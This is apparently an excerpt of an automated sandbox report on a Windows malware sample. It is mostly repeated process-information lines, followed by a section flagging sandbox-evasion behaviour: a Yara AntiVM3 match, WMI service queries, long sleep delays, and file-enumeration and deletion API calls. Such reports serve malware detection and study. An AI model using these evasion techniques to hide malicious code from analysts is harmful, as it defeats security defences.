                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7244, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7632, type: MEMORYSTR
                  Delayed program exit found
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040F7A7 Sleep,ExitProcess,4_2_0040F7A7
                  Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
                  Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,7_2_0040DD85
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,4_2_0041A748
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4222Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5637Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 2237Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 7237Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: foregroundWindowGot 1767Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6539Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3231Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7550
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2233
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 9.6 %
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4112Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4320Thread sleep count: 235 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4320Thread sleep time: -117500s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6152Thread sleep count: 2237 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6152Thread sleep time: -6711000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6152Thread sleep count: 7237 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6152Thread sleep time: -21711000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exe TID: 2300Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7680Thread sleep count: 7550 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7684Thread sleep count: 2233 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7708Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_2_00409253
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,4_2_0041C291
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,4_2_0040C34D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_2_00409665
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0044E879 FindFirstFileExA,4_2_0044E879
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,4_2_0040880C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040783C FindFirstFileW,FindNextFileW,4_2_0040783C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,4_2_00419AF5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,4_2_0040BB30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,4_2_0040BD37
